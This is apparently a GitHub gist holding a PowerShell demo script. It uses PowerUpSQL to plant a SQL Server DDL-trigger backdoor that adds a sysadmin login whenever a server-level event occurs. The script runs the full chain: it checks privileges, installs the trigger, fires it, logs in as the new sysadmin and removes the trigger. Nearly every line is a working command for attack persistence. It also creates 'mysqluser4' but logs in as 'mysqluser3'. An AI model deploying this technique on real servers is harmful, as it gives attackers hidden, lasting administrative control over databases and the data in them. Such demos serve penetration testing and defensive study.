Last active
August 1, 2018 15:51
-
-
Save nullbind/0ca1ff0af72aa5cf8a71fccda2c99b1e to your computer and use it in GitHub Desktop.
SQL Server - Persist via DDL Trigger - Demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# PowerUpSQL | |
# SQL Server - Persist via DDL Trigger - Demo | |
# Note: The assumption is that the connecting Windows user has sysadmin privileges. | |
# Get local instances | |
Get-SQLInstanceLocal | |
# Get info for the instance to confirm sysadmin | |
Get-SQLServerInfo -Verbose -Instance MSSQLSRV04\SQLSERVER2014 | |
# Get list of users and note there is no mysqluser | |
Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Query "select name from master..syslogins where name like 'mysqluser%'" | |
# Get list of tiggers | |
Get-SQLTriggerDdl -Verbose -Instance MSSQLSRV04\SQLSERVER2014 | |
# Add backdoor trigger to add sysadmin on any DDL event | |
Get-SQLPersistTriggerDDL -Instance "MSSQLSRV04\SQLSERVER2014" -NewSqlUser mysqluser4 -NewSqlPass NewPassword123! | |
# Confirm backdoor trigger was added | |
Get-SQLTriggerDdl -Verbose -Instance MSSQLSRV04\SQLSERVER2014 | |
# Trip the trigger using any server level event | |
Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Query "sp_configure 'show advanced options',1;reconfigure" | |
# Get list of users | |
Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Query "select name from master..syslogins where name like 'mysqluser%'" | |
# Log in using new sysadmin | |
Get-SQLServerInfo -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -username mysqluser3 -password 'NewPassword123!' | |
# Remove trigger, then user can be removed too | |
# Note: if you do not remove the trigger first, the user will get added back in by the trigger | |
Get-SQLPersistTriggerDDL -Instance "MSSQLSRV04\SQLSERVER2014" -NewSqlUser mysqluser4 -NewSqlPass NewPassword123! -Remove | |
# Confirm backdoor trigger is removed | |
Get-SQLTriggerDdl -Verbose -Instance MSSQLSRV04\SQLSERVER2014 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment